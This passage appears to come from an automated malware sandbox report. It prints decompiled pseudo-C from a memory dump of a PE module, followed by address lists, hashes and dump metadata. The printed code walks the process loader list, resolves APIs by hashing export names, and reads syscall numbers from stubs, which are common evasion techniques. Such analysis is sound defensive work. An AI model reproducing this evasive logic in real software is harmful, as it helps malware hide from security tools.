									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x6ef59377
0x6ef5937b
0x6ef59387
0x6ef5938b
0x6ef5938f
0x6ef59394
0x6ef59397
0x6ef59399
0x6ef5939b
0x6ef5939b
0x6ef5939e
0x6ef593a4
0x6ef5941c
0x6ef59420
0x6ef59423
0x6ef59423
0x6ef59426
0x00000000
0x6ef59426
0x6ef593ab
0x6ef59413
0x6ef59417
0x00000000
0x6ef59417
0x6ef593b2
0x6ef5940b
0x6ef5940e
0x00000000
0x6ef5940e
0x6ef593b7
0x6ef593f5
0x6ef593fc
0x6ef593ff
0x6ef593c8
0x6ef593c8
0x6ef593ce
0x00000000
0x00000000
0x6ef593d3
0x6ef593ed
0x6ef593f0
0x00000000
0x6ef593f0
0x6ef593d8
0x00000000
0x6ef593da
0x6ef593de
0x6ef593e1
0x00000000
0x6ef593e1
0x6ef593d8
0x6ef59429
0x6ef59429
0x6ef59429
0x6ef59432
0x6ef5943b
0x6ef5943e
0x6ef59441
0x6ef59444
0x6ef59447
0x6ef5944d
0x6ef5948f
0x6ef59492
0x6ef59493
0x6ef5949a
0x6ef5949d
0x6ef5944f
0x6ef59453
0x6ef5945d
0x6ef59464
0x6ef59466
0x6ef5947f
0x6ef59482
0x6ef59482
0x6ef59464
0x6ef594a5
0x6ef594a8
0x6ef594ab
0x6ef594af
0x6ef594b3
0x6ef594bd
0x6ef594c1
0x6ef594cb
0x6ef594d4
0x6ef594e1
0x6ef594e4
0x6ef594e7
0x6ef594e7
0x6ef594f3
0x6ef594fe
0x6ef59504
0x6ef59508
0x6ef594f5
0x6ef594f5
0x6ef594f5
0x6ef59510
0x6ef5953a
0x6ef59540
0x6ef59540
0x6ef59548
0x6ef598f1
0x6ef598f7
0x6ef598fd
0x6ef598fd
0x00000000
0x6ef5954e
0x6ef5954e
0x6ef59552
0x6ef59555
0x6ef59558
0x6ef5955b
0x6ef5955f
0x6ef59561
0x6ef59564
0x6ef59567
0x6ef5956b
0x6ef59570
0x6ef59573
0x6ef59577
0x6ef5957c
0x6ef5957f
0x6ef59581
0x6ef59584
0x6ef59588
0x6ef5958d
0x6ef5959d
0x6ef595a3
0x6ef595a3
0x6ef595ab
0x6ef595ad
0x6ef595b6
0x6ef595b8
0x6ef595bb
0x6ef595c6
0x6ef595f3
0x6ef595c8
0x6ef595df
0x6ef595df
0x6ef595fb
0x6ef59601
0x6ef59607
0x6ef59607
0x6ef595fb
0x6ef595b6
0x6ef5960e
0x6ef5967f
0x6ef59684
0x6ef596dd
0x6ef5979f
0x6ef597a4
0x6ef597b3
0x6ef597b9
0x6ef597bd
0x6ef597c6
0x6ef597cd
0x6ef597d6
0x6ef597e4
0x6ef597e7
0x6ef597cf
0x6ef597cf
0x6ef597cf
0x6ef597cd
0x6ef597f0
0x6ef5981d
0x6ef59830
0x6ef59838
0x6ef5981f
0x6ef59821
0x6ef59829
0x6ef59829
0x6ef597f2
0x6ef597f7
0x6ef59816
0x6ef597f9
0x6ef597fe
0x6ef5980f
0x6ef59800
0x6ef59800
0x6ef59800
0x6ef597fe
0x6ef597f7
0x6ef59840
0x6ef5984f
0x6ef5985c
0x6ef59865
0x6ef59869
0x6ef5986d
0x6ef59870
0x6ef59873
0x6ef59876
0x6ef59879
0x6ef5987c
0x6ef59882
0x6ef59886
0x6ef5988c
0x6ef5988c
0x6ef59882
0x6ef59892
0x6ef598cf
0x6ef598d3
0x6ef598da
0x6ef598e0
0x6ef59894
0x6ef59897
0x6ef598b7
0x6ef598bb
0x6ef598c2
0x6ef598c9
0x6ef59899
0x6ef5989c
0x6ef5989e
0x6ef598a2
0x6ef598ac
0x6ef598b2
0x6ef598b2
0x6ef5989c
0x6ef59897
0x6ef598e7
0x6ef598e7
0x6ef59900
0x6ef59900
0x6ef59906
0x6ef5990b
0x6ef59965
0x6ef5996a
0x6ef599a9
0x6ef599ae
0x6ef599b0
0x6ef599b4
0x6ef599b7
0x6ef599ba
0x6ef599bc
0x6ef599bd
0x6ef599bd
0x6ef599c2
0x6ef599e0
0x6ef599e2
0x6ef599e6
0x6ef599ec
0x6ef599ef
0x6ef599f1
0x6ef599f2
0x6ef599f2
0x00000000
0x6ef599c4
0x6ef599c4
0x6ef599c4
0x6ef599c8
0x6ef599ce
0x6ef599d1
0x6ef599d3
0x6ef599d6
0x6ef599f5
0x6ef599f5
0x6ef599fc
0x6ef59a16
0x6ef599fe
0x6ef599fe
0x6ef59a0a
0x6ef59a0b
0x6ef59a0e
0x6ef59a0e
0x6ef59a24
0x6ef59a24
0x6ef599c2
0x6ef5996f
0x6ef5997d
0x6ef59995
0x6ef59999
0x6ef5999c
0x6ef599a2
0x6ef599a6
0x6ef599a6
0x00000000
0x6ef599a6
0x6ef5997f
0x6ef59983
0x6ef59989
0x6ef59989
0x6ef5998f
0x00000000
0x6ef5998f
0x6ef59971
0x6ef59975
0x00000000
0x6ef59975
0x6ef5990f
0x6ef5993b
0x6ef59953
0x6ef59957
0x6ef5995a
0x6ef5995d
0x6ef5995f
0x6ef59962
0x6ef5993d
0x6ef5993d
0x6ef59941
0x6ef59944
0x6ef59947
0x6ef5994a
0x6ef5994d
0x6ef5994d
0x00000000
0x6ef5993b
0x6ef59915
0x00000000
0x00000000
0x6ef5991b
0x6ef5991f
0x6ef59925
0x6ef59928
0x6ef5992b
0x6ef5992e
0x00000000
0x6ef5992e
0x6ef597a6
0x6ef597aa
0x6ef597b0
0x00000000
0x6ef597b0
0x6ef596e8
0x6ef596fa
0x6ef596ff
0x6ef5976a
0x00000000
0x00000000
0x6ef59771
0x6ef59797
0x6ef5979b
0x00000000
0x00000000
0x6ef5977a
0x6ef5977f
0x6ef59793
0x00000000
0x00000000
0x00000000
0x6ef59795
0x6ef59786
0x00000000
0x00000000
0x6ef5978b
0x00000000
0x00000000
0x6ef5978d
0x00000000
0x6ef59771
0x6ef59701
0x6ef5970b
0x6ef5971c
0x6ef5971f
0x6ef59722
0x6ef59728
0x00000000
0x00000000
0x00000000
0x00000000
0x6ef5972e
0x6ef5972e
0x6ef5972e
0x6ef59735
0x00000000
0x00000000
0x6ef59737
0x6ef5973a
0x6ef59740
0x00000000
0x00000000
0x00000000
0x6ef59742
0x6ef59744
0x6ef5974d
0x00000000
0x00000000
0x6ef59761
0x00000000
0x00000000
0x00000000
0x6ef59763
0x6ef596ef
0x00000000
0x00000000
0x00000000
0x6ef596f5
0x6ef59689
0x6ef596b8
0x6ef596b9
0x6ef596c2
0x00000000
0x6ef596d3
0x00000000
0x6ef596d3
0x6ef59690
0x6ef59693
0x6ef596a6
0x6ef596a7
0x6ef596ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ef59693
0x6ef59689
0x6ef59615
0x6ef59672
0x6ef59676
0x6ef5967c
0x00000000
0x6ef5967c
0x6ef59617
0x6ef5961b
0x6ef59628
0x6ef5962c
0x6ef59642
0x6ef5964a
0x6ef5962e
0x6ef59630
0x6ef5963a
0x6ef5963a
0x6ef59650
0x6ef59659
0x6ef59670
0x00000000
0x00000000
0x00000000
0x6ef59670
0x6ef5965b
0x6ef5965b
0x00000000
0x6ef59650

Strings

, xrefs: 6EF599DB

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction ID: c00cfee97e4b79e0513d5546fbe2d7ab5671213bda1ff3204750e0a749e0ecdc
Opcode Fuzzy Hash: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction Fuzzy Hash: 39229EB14083868BD718DF55C4A136ABBE1EFB6300F04886EE8F54B391DB359965CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6EF5143C, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6EF5143C(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6EF50304(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6ef5d208 == 0 ||  *0x6ef5d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0xe462d21c;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6EF54FFC( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6ef5d2f0 |  *0x6ef5d2f1;
									if(( *0x6ef5d2f0 |  *0x6ef5d2f1) == 0) {
										_t525 =  *0x6ef5d208; // 0x2b71340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6ef5d2f0 = 1;
											_t526 = E6EF5361C(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6EF51C30(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6ef5d208 = _t526;
											 *0x6ef5d2f0 = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6EF5361C(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6EF51C30(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6EF4DFC0(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6EF4DFC0(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x1c6ef387;
									if(_t535[0x54] == 0x1c6ef387) {
										 *0x6ef5d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x45b68b68;
										if(_t535[0x54] == 0x45b68b68) {
											 *0x6ef5d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6EF4E8A8( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6EF5306C(0x60a28c5c, 0x522ec1f2, 0x60a28c5c, 0x60a28c5c);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6ef5d2e4 = 1;
					E6EF4F584( &(_t535[0x38]), 0);
					E6EF4F584( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6EF4F4BC( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6EF5306C(0x60a28c5c, 0xe7942190, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6EF4F828( &(_t535[0xc]), E6EF4F4CC( &(_t535[8])) + 0x14);
								_t369 = E6EF4F4BC( &(_t535[0xc]), E6EF4F4CC( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6EF4F654( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6EF4F584( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6EF4F654( &(_t535[8]));
							E6EF4F654( &(_t535[0x164]));
							E6EF4F584( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6EF4F584( &(_t535[0x20]), 0);
							_push(0x60a28c5c);
							_t289 = E6EF51D34(0x60a28c5c);
							_t290 = E6EF512EC( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6EF51C6C( &(_t535[0x164]), 0x60a28c5c);
							_t518 =  &(_t535[0x178]);
							E6EF4D014( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6EF55CD4( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6EF55D08( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6EF58E08( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6EF4F654( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6EF4BB44( &(_t535[0x110]));
							}
							E6EF4CFDC( &(_t535[0x104]));
							E6EF4CFDC(_t518);
							E6EF4CFDC( &(_t535[0x15c]));
							E6EF4CFDC( &(_t535[0x154]));
							E6EF590EC( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6EF4F618( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6EF590B0( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6EF4F4BC( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6EF4F4CC( &(_t535[0x44]));
								_t519 =  *(0x6ef5bd40 + _t381 * 4);
								_t531 = E6EF5907C( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6EF587E8( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6EF4F4CC( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6EF4F4DC( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6EF4F4CC( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6EF4F828( &(_t535[0x20]), E6EF4F4CC( &(_t535[0x1c])) + 8);
										E6EF4F4BC( &(_t535[0x20]), E6EF4F4CC( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6EF5317C(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6EF4F828( &(_t535[0x48]), _t535[0x70]);
									E6EF5317C(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6EF4F840( &(_t535[0x44]), _t563);
									E6EF4F840( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6EF5913C( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6EF59104( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6EF4F654( &(_t535[0x144]));
									E6EF4F654( &(_t535[0x134]));
									goto L38;
								}
								 *0x6ef5d2ec =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6EF4F654( &(_t535[0x11c]));
							E6EF58E68(_t381,  &(_t535[0xd8]));
							E6EF4F654( &(_t535[0x1c]));
							E6EF4F654( &(_t535[0x44]));
							E6EF4F654( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6EF4F4BC( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6EF4F828( &(_t535[0x38]), E6EF4F4CC( &(_t535[0x34])) + 0x14);
							_t347 = E6EF4F4BC( &(_t535[0x38]), E6EF4F4CC( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6EF4F4BC( &(_t535[0xc]), _t62);
						_t455 = E6EF4F4BC( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x6ef51448
0x6ef5144f
0x6ef51452
0x6ef51459
0x6ef51bdb
0x6ef51bdb
0x6ef5145f
0x6ef5146a
0x6ef519a9
0x6ef519ad
0x00000000
0x6ef51c2c
0x6ef519b3
0x6ef519b6
0x6ef519b9
0x6ef519c3
0x6ef519d2
0x6ef519d4
0x6ef519db
0x6ef51bc5
0x6ef51bc7
0x6ef51bca
0x6ef51bce
0x00000000
0x6ef51bce
0x6ef519ea
0x6ef519f5
0x6ef519fc
0x6ef519ff
0x6ef51a01
0x6ef51a04
0x6ef51a07
0x6ef51a0d
0x6ef51a1b
0x6ef51a2b
0x6ef51a50
0x6ef51a61
0x6ef51a64
0x6ef51a66
0x6ef51aca
0x6ef51acd
0x6ef51acd
0x6ef51acf
0x6ef51ad2
0x6ef51ad6
0x6ef51ad6
0x6ef51ada
0x00000000
0x00000000
0x6ef51ae7
0x6ef51aed
0x6ef51b21
0x6ef51b27
0x6ef51b29
0x6ef51bf8
0x6ef51c00
0x6ef51c03
0x6ef51c05
0x6ef51c1c
0x6ef51c1c
0x6ef51c07
0x6ef51c0b
0x6ef51c10
0x6ef51c10
0x6ef51c1e
0x6ef51c24
0x6ef51b43
0x6ef51b43
0x6ef51b45
0x6ef51b45
0x6ef51b47
0x6ef51b47
0x6ef51b4c
0x00000000
0x00000000
0x6ef51b4e
0x6ef51b4f
0x6ef51b52
0x6ef51b55
0x00000000
0x00000000
0x6ef51b61
0x6ef51b64
0x6ef51b66
0x6ef51b7d
0x6ef51b7d
0x6ef51b68
0x6ef51b6c
0x6ef51b71
0x6ef51b71
0x6ef51b8a
0x6ef51b8d
0x6ef51b96
0x6ef51b99
0x6ef51bbc
0x6ef51bc0
0x00000000
0x6ef51bc0
0x6ef51ba1
0x6ef51ba1
0x6ef51bad
0x6ef51bb0
0x6ef51bb9
0x00000000
0x6ef51bb9
0x6ef51b2f
0x6ef51b3f
0x6ef51b3f
0x6ef51b41
0x00000000
0x00000000
0x6ef51b37
0x6ef51b39
0x6ef51b39
0x00000000
0x6ef51b3f
0x6ef51aef
0x6ef51af7
0x6ef51b17
0x6ef51af9
0x6ef51af9
0x6ef51b01
0x6ef51b0a
0x6ef51b0a
0x6ef51b01
0x00000000
0x6ef51af7
0x6ef51a68
0x6ef51a6f
0x00000000
0x00000000
0x6ef51a7c
0x6ef51a82
0x6ef51a87
0x6ef51a8e
0x6ef51a92
0x6ef51aa7
0x6ef51aa9
0x6ef51aab
0x6ef51ab1
0x6ef51abf
0x6ef51abf
0x6ef51ac5
0x00000000
0x6ef51ac5
0x00000000
0x00000000
0x00000000
0x00000000
0x6ef51a0f
0x6ef51a0f
0x6ef51a0f
0x6ef51a10
0x6ef51a13
0x6ef51a17
0x00000000
0x6ef51a2d
0x6ef51a30
0x6ef51a33
0x6ef51a3c
0x6ef51a3f
0x6ef51a40
0x6ef51a42
0x00000000
0x6ef5147d
0x6ef5147f
0x6ef51484
0x6ef5148f
0x6ef5149d
0x6ef514b0
0x6ef514bd
0x6ef514c6
0x6ef514ca
0x6ef514ce
0x6ef51516
0x6ef51516
0x6ef51518
0x6ef5151f
0x00000000
0x00000000
0x6ef51538
0x6ef51540
0x6ef51544
0x6ef51559
0x6ef5155d
0x6ef51561
0x6ef5156a
0x6ef51570
0x6ef51573
0x6ef51577
0x6ef5157f
0x6ef51581
0x6ef51585
0x6ef5158c
0x6ef51595
0x6ef51595
0x6ef51599
0x6ef515ae
0x6ef515c4
0x6ef515d1
0x6ef515d2
0x6ef515d2
0x6ef515d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6ef5158e
0x6ef5158e
0x6ef5158e
0x6ef5158f
0x6ef51590
0x00000000
0x6ef5158e
0x6ef51553
0x6ef51557
0x00000000
0x00000000
0x00000000
0x6ef515d8
0x6ef515d8
0x6ef515d9
0x6ef515dc
0x6ef515e6
0x6ef515e6
0x6ef515ea
0x6ef515f1
0x6ef5164c
0x6ef51651
0x6ef516a4
0x6ef516a4
0x6ef516a8
0x6ef516ac
0x6ef514d6
0x6ef514d9
0x6ef514de
0x6ef514e4
0x6ef514e7
0x6ef514ee
0x6ef514f2
0x6ef514f9
0x6ef51502
0x6ef51506
